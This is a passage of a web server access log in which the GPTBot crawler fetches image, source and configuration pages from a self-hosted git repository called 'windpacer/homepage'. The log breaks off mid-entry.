"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275077] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" -[17/Feb/2026:13:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699382] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" -[17/Feb/2026:13:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" -[17/Feb/2026:13:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10825] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641761] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508439] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508443] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692337] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641763] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 7269761] [Gzip 12.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" -[17/Feb/2026:13:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9859] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" -[17/Feb/2026:13:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" -[17/Feb/2026:13:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" -[17/Feb/2026:13:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" -[17/Feb/2026:13:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 74.7.227.38] [Length 11409] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15322] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11885] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 74.7.227.38] [Length 21805] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 74.7.227.38] [Length 21804] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498815] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:58:10 +0000] - 200 200 - GET https 